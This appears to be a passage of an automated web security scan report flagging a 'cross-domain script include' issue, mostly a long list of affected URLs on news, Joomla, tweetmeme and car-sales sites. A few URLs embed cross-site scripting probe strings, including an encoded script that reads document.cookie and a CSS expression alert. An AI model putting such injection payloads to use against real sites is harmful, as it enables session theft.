<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
<map name="logomap"><area shape="rect" coords="269,64,318,82" href="http://www.cw56.com/" alt="Visit cw56.com" /></map>
...[SNIP]...
<div class='ui-helper-clearfix'><a href="http://www.facebook.com/7NEWS" target="_blank"><img src="http://www1.whdh.com/images/icons/fb18.gif" alt="7News on Facebook" /></a><a href="http://www.twitter.com/7News" target="_blank"><img src="http://www1.whdh.com/images/icons/twitter18.gif" alt="7News on Twitter" />
...[SNIP]...

21. Cross-domain script include previous next
There are 1599 instances of this issue:

http://ad.turn.com/server/ads.js
http://ad.turn.com/server/ads.js
http://ads.tweetmeme.com/serve.js
http://ads.tweetmeme.com/serve.js
http://ads.tweetmeme.com/serve.js
http://adserver.teracent.net/tase/ad
http://autotrader.dealix.com/step1.asp
http://blog.tweetmeme.com/
http://blog.tweetmeme.com/wp-content/themes/tweetmeme-0.2/prototype.js
http://blog.tweetmeme.com/wp-content/themes/tweetmeme-0.2/scriptaculous.js
http://brandonaaron.net/
http://cdn.cloudscan.us/examples/html/sql-injection-xss-cross-site-scripting-dork.html
http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html
http://cherne.net/brian/resources/jquery.hoverIntent.html
http://code.google.com/p/swfobject/
http://community.joomla.org/
http://community.joomla.org/blogs/community.html
http://community.joomla.org/blogs/community/1390-jdaychile.html
http://community.joomla.org/blogs/community/1392-joomla-day-chile-to-be-broadcast-live.html
http://community.joomla.org/blogs/community/1398-joomladay-chile-2011-recap.html
http://community.joomla.org/blogs/leadership/1389-joomla-16-arrives-thanks-for-a-job-well-done.html
http://community.joomla.org/blogs/leadership/1391-joomla-16-presented-at-codemash.html
http://community.joomla.org/blogs/leadership/1395-the-path-forward-migration-and-the-future.html
http://community.joomla.org/connect.html
http://community.joomla.org/connect/social.html
http://community.joomla.org/events.html
http://community.joomla.org/events/34-event-news/1393-joomla-16-release-party-in-pune-india.html
http://community.joomla.org/events/joomla-days/1343-joomla-day-chile-2011.html
http://community.joomla.org/events/joomla-days/1394-joomladay-the-netherlands-2011.html
http://community.joomla.org/events/joomla-days/975-joomladay-charter.html
http://community.joomla.org/featured-articles.html
http://community.joomla.org/featured-articles/1070-vulnerability-list-update.html
http://community.joomla.org/featured-articles/1201-priority-vs-speed-decent-docs-and-cut-and-paste.html
http://community.joomla.org/featured-articles/did-you-know.html
http://community.joomla.org/gsoc2009.html
http://community.joomla.org/index.php
http://community.joomla.org/login.html
http://community.joomla.org/showcase/
http://community.joomla.org/showcase/how-to-submit-a-site.html
http://community.joomla.org/showcase/sites-of-the-month.html
http://community.joomla.org/showcase/sites/advsearch.html
http://community.joomla.org/showcase/sites/new.html
http://community.joomla.org/translations.html
http://community.joomla.org/translations/translation-policy.html
http://community.joomla.org/user-groups.html
http://comunidadjoomla.org/component/content/article/109-general-joomla-16x/202-joomla-16-ya-ha-llegado.html
http://creativecommons.org/licenses/by/3.0/
http://d1.openx.org/afr.php
http://demo.joomla.org/
http://demo.joomla.org/index.php
http://dir.filewatcher.com/d/FreeBSD.0.0.htm
http://dir.filewatcher.com/d/FreeBSD/6-stable.0.0.htm
http://dir.filewatcher.com/d/FreeBSD/6-stable/amd64/aub-2.2.tbz.41898.html
http://dir.filewatcher.com/d/FreeBSD/6-stable/ia64/aub-2.2.tbz.41897.html
http://dir.filewatcher.com/d/FreeBSD/6-stable/sparc64/aub-2.2.tbz.41911.html
http://dir.filewatcher.com/d/FreeBSD/6.2-release.0.0.htm
http://dir.filewatcher.com/d/FreeBSD/6.2-release/sparc64/aub-2.2.tbz.41730.html
http://dir.filewatcher.com/d/FreeBSD/6.3-release.0.0.htm
http://dir.filewatcher.com/d/FreeBSD/6.3-release/amd64/aub-2.2.tbz.41893.html
http://dir.filewatcher.com/d/FreeBSD/6.3-release/i386/aub-2.2.tbz.41785.html
http://dir.filewatcher.com/d/FreeBSD/7-current.0.0.htm
http://dir.filewatcher.com/d/FreeBSD/7-current/amd64.0.0.htm
http://dir.filewatcher.com/d/FreeBSD/7-current/amd64/aub-2.2.tbz.41904.html
http://dir.filewatcher.com/d/FreeBSD/7-current/ia64/aub-2.2.tbz.41797.html
http://dir.filewatcher.com/d/FreeBSD/7.0-release.0.0.htm
http://dir.filewatcher.com/d/FreeBSD/7.0-release/amd64/aub-2.2.tbz.41906.html
http://dir.filewatcher.com/d/FreeBSD/7.0-release/i386/aub-2.2.tbz.41895.html
http://dir.filewatcher.com/d/FreeBSD/7.0-release/sparc64/aub-2.2.tbz.41941.html
http://dir.filewatcher.com/d/FreeBSD/8-current.0.0.htm
http://dir.filewatcher.com/d/FreeBSD/8-current/amd64.0.0.htm
http://dir.filewatcher.com/d/FreeBSD/8-current/amd64/aub-2.2.tbz.41917.html
http://dir.filewatcher.com/d/FreeBSD/distfiles.0.0.htm
http://dir.filewatcher.com/d/FreeBSD/distfiles/Other/aub-2.1.3.tar.gz.55334.html
http://dir.filewatcher.com/d/OpenBSD.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/3.3/alpha/aub-2.0.5.tgz.32295.html/x22
http://dir.filewatcher.com/d/OpenBSD/3.4.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/3.4/i386.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/3.4/i386/aub-2.0.5.tgz.32469.html
http://dir.filewatcher.com/d/OpenBSD/3.4/sparc.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/3.4/sparc/aub-2.0.5.tgz.32468.html
http://dir.filewatcher.com/d/OpenBSD/3.4/sparc64.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/3.4/sparc64/aub-2.0.5.tgz.32472.html
http://dir.filewatcher.com/d/OpenBSD/3.7.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/3.7/powerpc.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/3.7/powerpc/aub-2.0.5.tgz.32553.html
http://dir.filewatcher.com/d/OpenBSD/3.9.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/3.9/sparc.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/3.9/sparc/aub-2.0.5.tgz.32478.html
http://dir.filewatcher.com/d/OpenBSD/4.0.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/4.0/alpha.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/4.0/alpha/aub-2.0.5.tgz.32474.html
http://dir.filewatcher.com/d/OpenBSD/4.0/amd64.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/4.0/amd64/aub-2.0.5.tgz.32470.html
http://dir.filewatcher.com/d/OpenBSD/4.0/m68k.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/4.0/m68k/aub-2.0.5.tgz.32479.html
http://dir.filewatcher.com/d/OpenBSD/4.0/sparc.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/4.0/sparc/aub-2.0.5.tgz.32477.html
http://dir.filewatcher.com/d/OpenBSD/4.1.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/4.1/alpha.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/4.1/alpha/aub-2.0.5.tgz.32475.html
http://dir.filewatcher.com/d/OpenBSD/4.1/i386.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/4.1/i386/aub-2.0.5.tgz.32473.html
http://dir.filewatcher.com/d/OpenBSD/4.1/mips64.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/4.1/mips64/aub-2.0.5.tgz.32471.html
http://dir.filewatcher.com/d/OpenBSD/4.1/sparc.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/4.1/sparc/aub-2.0.5.tgz.32480.html
http://dir.filewatcher.com/d/OpenBSD/4.1/sparc64.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/4.1/sparc64/aub-2.0.5.tgz.32476.html
http://dir.filewatcher.com/d/OpenBSD/4.2.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/4.2/alpha.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/4.2/alpha/aub-2.0.5.tgz.32467.html
http://dir.filewatcher.com/d/OpenBSD/4.2/amd64.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/4.2/amd64/aub-2.0.5.tgz.32461.html
http://dir.filewatcher.com/d/OpenBSD/4.2/i386.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/4.2/i386/aub-2.0.5.tgz.32462.html
http://dir.filewatcher.com/d/OpenBSD/4.2/powerpc.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/4.2/powerpc/aub-2.0.5.tgz.32466.html
http://dir.filewatcher.com/d/OpenBSD/4.3.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/4.3/i386.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/4.3/i386/aub-2.0.5.tgz.32459.html
http://dir.filewatcher.com/d/OpenBSD/snapshots.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/snapshots/alpha.0.0.htm
http://dir.filewatcher.com/d/OpenBSD/snapshots/alpha/aub-2.0.5.tgz.32465.html
http://dir.filewatcher.com/d/Other.0.0.htm
http://dir.filewatcher.com/d/Other/noarch.0.0.htm
http://dir.filewatcher.com/d/Other/noarch/Applications.0.0.htm
http://dir.filewatcher.com/d/Other/noarch/Applications/Communications.0.0.htm
http://dir.filewatcher.com/d/Other/noarch/Applications/Communications/aub-2.0.5-10.noarch.rpm.73595.html
http://dir.filewatcher.com/d/Other/src.0.0.htm
http://dir.filewatcher.com/packages-directory.html
http://disqus.com/
http://disqus.com/AnonymousUser/
http://disqus.com/dashboard/x22/x3Eview
http://disqus.com/embed/profile/unmerged_profiles/
http://disqus.com/forums/7newsboston/facebook.html
http://disqus.com/forums/integrations/twitter/tweetbox.html
http://disqus.com/forums/integrations/twitter/tweetbox.html
http://disqus.com/profile/login/
http://disqus.com/saml/cnn/try/
http://docs.joomla.org/
http://docs.joomla.org/Administrators
http://docs.joomla.org/Beginners
http://docs.joomla.org/Category:Cookie_jar
http://docs.joomla.org/Category:Development
http://docs.joomla.org/Category:FAQ
http://docs.joomla.org/Category:Tips_and_tricks
http://docs.joomla.org/Cookie_jar
http://docs.joomla.org/Developer_Email_lists
http://docs.joomla.org/Developers
http://docs.joomla.org/Development_Working_Group
http://docs.joomla.org/Documentation_Working_Group
http://docs.joomla.org/Evaluators
http://docs.joomla.org/GHOP_students/James_William_Ramsay
http://docs.joomla.org/GHOP_students/Kevin_Hayne
http://docs.joomla.org/GHOP_students/Michael_Casha
http://docs.joomla.org/Help_screens
http://docs.joomla.org/Joomla!_Extension_Directory_FAQs
http://docs.joomla.org/Joomla_Administrators_Security_Checklist
http://docs.joomla.org/Migrating_from_1.0.x_to_1.5_Stable
http://docs.joomla.org/Portal:Bug_Squad
http://docs.joomla.org/Start_here
http://docs.joomla.org/Template
http://docs.joomla.org/Tutorial:Creating_a_basic_Joomla!_template
http://docs.joomla.org/Upgrading_1.5_from_an_existing_1.5x_version
http://docs.joomla.org/Web_designers
http://docs.joomla.org/Working_Groups
http://docs.joomla.org/index.php
http://docs.jquery.com/UI
http://docs.jquery.com/UI/Dialog
http://docs.jquery.com/UI/Draggables
http://docs.jquery.com/UI/Droppables
http://docs.jquery.com/UI/Effects/
http://docs.jquery.com/UI/Effects/Blind
http://docs.jquery.com/UI/Effects/Bounce
http://docs.jquery.com/UI/Effects/Clip
http://docs.jquery.com/UI/Effects/Drop
http://docs.jquery.com/UI/Effects/Explode
http://docs.jquery.com/UI/Effects/Fold
http://docs.jquery.com/UI/Effects/Highlight
http://docs.jquery.com/UI/Effects/Pulsate
http://docs.jquery.com/UI/Effects/Scale
http://docs.jquery.com/UI/Effects/Shake
http://docs.jquery.com/UI/Effects/Slide
http://docs.jquery.com/UI/Effects/Transfer
http://docs.jquery.com/UI/Resizables
http://docs.jquery.com/UI/Selectables
http://docs.jquery.com/UI/Sortables
http://ebookee.org/TrainSignal-Cisco-CCNA-Training-Videos_929461.html/x22
http://en.wikipedia.org/wiki/Amazon.com/x22
http://en.wikipedia.org/wiki/American_University_of_Beirut/x22
http://en.wikipedia.org/wiki/Auto_Trader/x22
http://en.wikipedia.org/wiki/Strike_Team
http://extensions.joomla.org/
http://extensions.joomla.org/extensions
http://extensions.joomla.org/extensions/advanced-search
http://extensions.joomla.org/extensions/languages/translations-for-joomla
http://extensions.joomla.org/extensions/new
http://flowplayer.org/tools/
http://fls.doubleclick.net/activityi
http://flybase.org/reports/FBgn0000146.html/x22
http://forum.joomla.org/
http://forum.joomla.org/ucp.php
http://forum.joomla.org/viewforum.php
http://forum.joomla.org/viewtopic.php
http://gegnia.com/joomla/informacion/mbrriti-joomla-1-pik-6
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://green.autobytel.com/
http://groups.google.com/group/alt.slack/msg/fa1fe1e3e6c31c9b/x22
http://groups.google.com/group/joomla-commits/topics
http://groups.google.com/group/joomla-dev-framework
http://groups.google.com/group/joomla-dev-general
http://groups.google.com/group/joomlabugsquad
http://groups.google.com/grphp
http://hairmakeup.tweetmeme.com/
http://help.tweetmeme.com/
http://help.tweetmeme.com/2009/04/07/api-documentation/
http://help.tweetmeme.com/2009/04/09/rss-feeds/
http://help.tweetmeme.com/2009/04/09/twitter-feeds/
http://help.tweetmeme.com/contact/
http://help.tweetmeme.com/language/
http://home.big.jp/flets/
http://howto.tweetmeme.com/
http://investor.autobytel.com/
http://iphone.tweetmeme.com/
http://it.toolbox.com/blogs/database-soup
http://it.toolbox.com/blogs/database-talk
http://it.toolbox.com/blogs/db2luw
http://it.toolbox.com/blogs/db2zos
http://it.toolbox.com/blogs/elsua
http://it.toolbox.com/blogs/juice-analytics
http://it.toolbox.com/blogs/minimalit
http://it.toolbox.com/blogs/penguinista-databasiensis
http://it.toolbox.com/blogs/ppmtoday
http://javascript.internet.com/
http://joomfa.org/joomla-16-persian.html
http://joomla.jp/news/1-projectnews/169-joomla-16-has-arrived.html
http://joomla.pl/powiadomienia/577-joomla-16-wydany.html
http://joomlacode.org/
http://joomlacode.org/gf/
http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=Nexternal.com/Joomla-Shopping-Cart&adT=Joomla+Compatible+Cart&adU=www.lynda.com&adT=Joomla+Tutorials&gl=US/x26amp
http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.Tenrox.com/Free_Demo&adT=Online+Project+Management&adU=www.eSpatial.com/Free-Trial&adT=Geographic+Information&gl=US/x26amp
http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.safepeak.com&adT=ImageAd&gl=US/x26amp
http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.sysaid.com&adT=ImageAd&gl=US/x26amp
http://joomlacode.org/gf/account/
http://joomlacode.org/gf/project/
http://joomlacode.org/gf/project/articlecomments/
http://joomlacode.org/gf/project/autobb/
http://joomlacode.org/gf/project/bm01/
http://joomlacode.org/gf/project/booking/
http://joomlacode.org/gf/project/com_joodater/
http://joomlacode.org/gf/project/com_joodater/news/
http://joomlacode.org/gf/project/demosite/
http://joomlacode.org/gf/project/docman/
http://joomlacode.org/gf/project/feedgator/frs/
http://joomlacode.org/gf/project/feedgator/news/
http://joomlacode.org/gf/project/imgttfmenu/news/
http://joomlacode.org/gf/project/jevents/
http://joomlacode.org/gf/project/joomfish/
http://joomlacode.org/gf/project/joomla/
http://joomlacode.org/gf/project/joomla/frs/
http://joomlacode.org/gf/project/joomla/mailman/
http://joomlacode.org/gf/project/joomla/news/
http://joomlacode.org/gf/project/joomla/reporting/
http://joomlacode.org/gf/project/joomla/scmsvn/
http://joomlacode.org/gf/project/joomla/search/
http://joomlacode.org/gf/project/joomla/tracker/
http://joomlacode.org/gf/project/joomla/tracker/%3F3ee00%2522style%253D%2522x%253Aexpression(alert(1
http://joomlacode.org/gf/project/joomlaxplorer/
http://joomlacode.org/gf/project/jpack/
http://joomlacode.org/gf/project/jpub/
http://joomlacode.org/gf/project/jtranslation/
http://joomlacode.org/gf/project/kunena/
http://joomlacode.org/gf/project/mambot_google1/news/
http://joomlacode.org/gf/project/opengallery/
http://joomlacode.org/gf/project/opengallery/news/
http://joomlacode.org/gf/project/showplus/
http://joomlacode.org/gf/project/spanish/
http://joomlacode.org/gf/project/sportpool/
http://joomlacode.org/gf/project/support/
http://joomlacode.org/gf/project/virtuemart/
http://joomlacode.org/gf/search/
http://joomlacode.org/gf/snippet/
http://joomlacode.org/gf/user/
http://joomlacode.org/gf/user/atrel/
http://joomlacode.org/gf/user/joodaterjoe/
http://joomlacode.org/gf/user/malkowitch/
http://joomlacode.org/gf/user/mattfaulds1/
http://joomlacode.org/gf/user/mikesamar/
http://jquery.com/
http://jquery.malsup.com/cycle/
http://jquery.org/license
http://jqueryui.com/about
http://jqueryui.com/themeroller/
http://justinbieber.tweetmeme.com/
http://keith-wood.name/bookmark.html
http://kontentdesign.com/
http://lesterchan.net/
http://linux.maruhn.com/directory.html
http://linux.maruhn.com/sec/aub.html
http://linux.maruhn.com/sec/aub.html/x22
http://loadus.exelator.com/load/net.php
http://mad4milk.net/
http://magazine.joomla.org/
http://media.fastclick.net/w/pg
http://netlingo.com/feedback.php
http://network4g.verizonwireless.com/
http://news.cnet.com/
http://nget.sourceforge.net/
http://openports.se/news/aub/x22
http://pan.rebelbase.com/
http://people.joomla.org/
http://picasaweb.google.com/lh/view
http://powersportsnetwork.com/
http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1
http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1
http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1
http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1
http://r1-ads.ace.advertising.com/site=772178/size=300250/u=2/bnum=49004778/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.abbreviations.com%252Fbs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E7a00ceef170%2526SE%253D3%2526r%253D1
http://resources.joomla.org/
http://resources.joomla.org/directory/advsearch.html
http://resources.joomla.org/directory/new.html
http://resources.joomla.org/how-to-add-listings.html
http://sabnzbd.org/
http://search.cpan.org/dist/Apache-NNTPGateway/
http://search.cpan.org/dist/NNML/
http://search.cpan.org/dist/NNTPClient/
http://search.cpan.org/dist/News-Article-NoCeM/
http://search.cpan.org/dist/POE-Component-Client-NNTP/
http://search.cpan.org/dist/POE-Component-Server-NNTP/
http://search.cpan.org/dist/newslib/
http://shopping.tweetmeme.com/
http://simonwillison.net/2004/May/26/addLoadEvent/
http://slashdot.org/bookmark.pl
http://smallbusinessnews.tweetmeme.com/
http://sorgalla.com/
http://sorgalla.com/jcarousel/
http://sourceforge.net/projects/nzbget/
http://sourceforge.net/projects/trn/
http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/xd_receiver.htm
http://techcrunch.com/
http://thenextweb.com/
http://top.net.mk/joomla-verzii/44-joomla-16-dojde
http://trailer.commercialtrucktrader.com/
http://tweetmeme.com/
http://tweetmeme.com/about
http://tweetmeme.com/about/advertising
http://tweetmeme.com/about/advertising/display
http://tweetmeme.com/about/advertising/featured_tweets
http://tweetmeme.com/about/advertising/retweet_ads
http://tweetmeme.com/about/bookmarklet
http://tweetmeme.com/about/channels
http://tweetmeme.com/about/follow_button
http://tweetmeme.com/about/plugins
http://tweetmeme.com/about/plugins/chrome
http://tweetmeme.com/about/privacy
http://tweetmeme.com/about/pro
http://tweetmeme.com/about/pro/signup
http://tweetmeme.com/about/retweet_button
http://tweetmeme.com/about/terms
http://tweetmeme.com/category/comedy
http://tweetmeme.com/category/comedy-animals
http://tweetmeme.com/category/comedy-fail
http://tweetmeme.com/category/entertainment
http://tweetmeme.com/category/entertainment-celebrity
http://tweetmeme.com/category/entertainment-comicsanimation
http://tweetmeme.com/category/entertainment-movies
http://tweetmeme.com/category/entertainment-music
http://tweetmeme.com/category/entertainment-television
http://tweetmeme.com/category/gaming
http://tweetmeme.com/category/gaming-nintendo
http://tweetmeme.com/category/gaming-pcgames
http://tweetmeme.com/category/gaming-playstation
http://tweetmeme.com/category/gaming-webgames
http://tweetmeme.com/category/gaming-xbox
http://tweetmeme.com/category/lifestyle
http://tweetmeme.com/category/lifestyle-autos
http://tweetmeme.com/category/lifestyle-educational
http://tweetmeme.com/category/lifestyle-events
http://tweetmeme.com/category/lifestyle-fooddrink
http://tweetmeme.com/category/lifestyle-health
http://tweetmeme.com/category/lifestyle-travelplaces
http://tweetmeme.com/category/science
http://tweetmeme.com/category/science-enviroment
http://tweetmeme.com/category/science-space
http://tweetmeme.com/category/sports
http://tweetmeme.com/category/sports-baseball
http://tweetmeme.com/category/sports-basketball
http://tweetmeme.com/category/sports-extreme
http://tweetmeme.com/category/sports-golf
http://tweetmeme.com/category/sports-hockey
http://tweetmeme.com/category/sports-motorsports
http://tweetmeme.com/category/sports-olympics
http://tweetmeme.com/category/sports-soccer
http://tweetmeme.com/category/sports-tennis
http://tweetmeme.com/category/technology
http://tweetmeme.com/category/technology-apple
http://tweetmeme.com/category/technology-design
http://tweetmeme.com/category/technology-gadgets
http://tweetmeme.com/category/technology-hardware
http://tweetmeme.com/category/technology-linuxunix
http://tweetmeme.com/category/technology-microsoft
http://tweetmeme.com/category/technology-programming
http://tweetmeme.com/category/technology-security
http://tweetmeme.com/category/technology-software
http://tweetmeme.com/category/worldbusiness
http://tweetmeme.com/category/worldbusiness-business
http://tweetmeme.com/category/worldbusiness-finance
http://tweetmeme.com/category/worldbusiness-jobs
http://tweetmeme.com/category/worldbusiness-news
http://tweetmeme.com/category/worldbusiness-politicalnews
http://tweetmeme.com/media/news
http://tweetmeme.com/page/10
http://tweetmeme.com/page/2
http://tweetmeme.com/page/3
http://tweetmeme.com/page/4
http://tweetmeme.com/page/5
http://tweetmeme.com/page/6
http://tweetmeme.com/page/7
http://tweetmeme.com/page/8
http://tweetmeme.com/page/9
http://tweetmeme.com/story/3703235206/office-365-for-education-leapfrogging-the-competition-whymicrosoft
http://tweetmeme.com/story/3829040762/i-me-mine-the-unholy-trinity-of-ayn-rand-tomfoolery
http://tweetmeme.com/story/3829268752/video-smack-fest-2011-in-queens-ny-2-girls-go-head-to-head-slapping-the-ish-out-each-other-for-2-000
http://tweetmeme.com/story/3829489042/inhabitats-week-in-green-self-sustaining-airships-turbine-base-jumpers-and-the-saharas-solar-oasis-engadget
http://tweetmeme.com/story/3829652883/ny-jets-qb-picks-his-nose-wipes-it-on-teammate
http://tweetmeme.com/story/3829698133/fear-this-says-the-pirate-bay-hinting-at-a-new-music-site
http://tweetmeme.com/story/3829806161/the-associated-press-fitness-guru-jack-lalanne-96-dies-at-calif-home
http://tweetmeme.com/story/3829851328/kevin-durant-mendenhall-what-r-u-doing-son-twitvid
http://tweetmeme.com/story/3829911938/good-thing-for-green-tech-ge-chief-jeff-immelt-to-chair-obama-s-council-on-jobs
http://tweetmeme.com/story/3830045531/jack-lalanne-dead-at-96-this-just-in-cnncom-blogs
http://tweetmeme.com/story/3830307800/why-3d-doesn-t-work-and-never-will-case-closed-roger-eberts-journal
http://tweetmeme.com/story/3831012837/day-2-is-a-wrap-hiam-video-coming-soon-britney-on-twitpic
http://tweetmeme.com/story/3831183930/nsfw-on-the-internet-nobody-knows-you-re-a-journalist
http://tweetmeme.com/story/3831192964/super-junior-s-heechul-lambastes-netizens-through-a-series-of-tweets
http://tweetmeme.com/story/3831576446/google-says-removing-reader-link-in-gmail-was-a-mistake-aims-to-bring-back-monday
http://tweetmeme.com/style/day
http://tweetmeme.com/update/ping
http://tweetmeme.com/user/DhilipSiva_Film
http://tweetmeme.com/user/DodgersLakers
http://tweetmeme.com/user/HarveyLevinTMZ
http://tweetmeme.com/user/Illlliam
http://tweetmeme.com/user/JMayisKING
http://tweetmeme.com/user/KDthunderup
http://tweetmeme.com/user/OnJonasDubu
http://tweetmeme.com/user/RWW
http://tweetmeme.com/user/TechCrunch
http://tweetmeme.com/user/YoPretty
http://tweetmeme.com/user/acorvelli
http://tweetmeme.com/user/alexia
http://tweetmeme.com/user/allkpop
http://tweetmeme.com/user/britneyspears
http://tweetmeme.com/user/carbonmeme
http://tweetmeme.com/user/cnn
http://tweetmeme.com/user/geekytechnews
http://tweetmeme.com/user/lorakolodny
http://tweetmeme.com/user/mjsonly
http://tweetmeme.com/user/otoolefan
http://tweetmeme.com/user/paulcarr
http://tweetmeme.com/user/reiserlaw
http://tweetmeme.com/user/worldstar
http://twitter.com/
http://twitter.com/
http://twitter.com/7News/
http://twitter.com/7News/newsteam
http://twitter.com/7News/status/29619600551317504
http://twitter.com/7news
http://twitter.com/LizPW/
http://twitter.com/LizPW/status/29620929206165504
http://twitter.com/cw56
http://twitter.com/datasift
http://twitter.com/goodies/tweetbutton
http://twitter.com/joomla
http://twitter.com/kontentdesign
http://twitter.com/nbc/primetime
http://twitter.com/netlingo
http://twitter.com/nickhalstead/status/15837113167
http://twitter.com/spies_assassins
http://twitter.com/tweetmeme
http://twitter.com/typekit
http://twitter.com/ups
http://ugg.tweetmeme.com/
http://whdhstore.hipcricket.com/
http://wordpress.org/extend/plugins/tweetmeme-follow-button/
http://wordpress.org/extend/plugins/tweetmeme/
http://wordpress.org/extend/plugins/wp-pagenavi/
http://world-cup-news.net/
http://www.abbreviations.com/
http://www.abbreviations.com/bs2.aspx
http://www.abbreviations.com/justadded.aspx
http://www.abbreviations.com/random.aspx
http://www.abbreviations.com/searchAmazon.aspx
http://www.addthis.com/bookmark.php
http://www.adside.com/adside/advertiser.html
http://www.adside.com/adside/publisher.html
http://www.aerotrader.com/
http://www.aerotrader.com/research/resources/
http://www.aerotrader.com/sell/
http://www.alistapart.com/articles/alternate/
http://www.amazon.com/
http://www.amazon.com/b/
http://www.amazon.com/gp/site-directory/x22
http://www.americascupmedia.com/index.php
http://www.armanijeans-theroom.com/
http://www.aspirationtech.org/
http://www.atvtraderonline.com/
http://www.atvtraderonline.com/find/
http://www.atvtraderonline.com/research/resources/
http://www.atvtraderonline.com/sell/
http://www.autobytel.com/
http://www.autobytel.com/a
http://www.autobytel.com/a.cfml
http://www.autobytel.com/ask-our-mechanics/my-garage.htm
http://www.autobytel.com/auto-insurance-quotes.htm
http://www.autobytel.com/car-advice.htm
http://www.autobytel.com/car-blog.htm
http://www.autobytel.com/car-dealers.htm
http://www.autobytel.com/car-financing.htm
http://www.autobytel.com/car-incentives.htm
http://www.autobytel.com/car-news.htm
http://www.autobytel.com/car-pictures.htm
http://www.autobytel.com/car-reviews.htm
http://www.autobytel.com/content/buy/finance/index.cfm/action/Calculator
http://www.autobytel.com/content/buy/index.cfm
http://www.autobytel.com/content/buy/index.cfm
http://www.autobytel.com/content/buy/warranty/index.cfm
http://www.autobytel.com/content/home/help/index.cfm
http://www.autobytel.com/content/home/help/index.cfm
http://www.autobytel.com/content/home/help/index.cfm/action/about
http://www.autobytel.com/content/home/help/index.cfm/action/contact
http://www.autobytel.com/content/home/help/index.cfm/action/privacy
http://www.autobytel.com/content/home/help/index.cfm/action/terms
http://www.autobytel.com/content/home/index.cfm
http://www.autobytel.com/content/home/index.cfm
http://www.autobytel.com/content/research/Reviews/index.cfm/action/addCtdStep1/reviewDo/Read/
http://www.autobytel.com/content/research/article/index.cfm
http://www.autobytel.com/content/research/article/index.cfm/filters/Auto%20Show
http://www.autobytel.com/content/research/article/index.cfm/filters/Buying%20Guide
http://www.autobytel.com/content/research/comparison/index.cfm
http://www.autobytel.com/content/research/kbb/index.cfm/action/selectyear/valuetype/TI
http://www.autobytel.com/content/research/top10/index.cfm/action/top10/vehicleclass/all/listtype/1
http://www.autobytel.com/coupons/my-garage.htm
http://www.autobytel.com/diagnose-problem/my-garage.htm
http://www.autobytel.com/my-garage.htm
http://www.autobytel.com/new-car-price-quotes.htm
http://www.autobytel.com/new-cars.htm
http://www.autobytel.com/repair-cost-calculator/my-garage.htm
http://www.autobytel.com/sitemap/index.cfm
http://www.autobytel.com/used-cars.htm
http://www.autobytel.com/x22
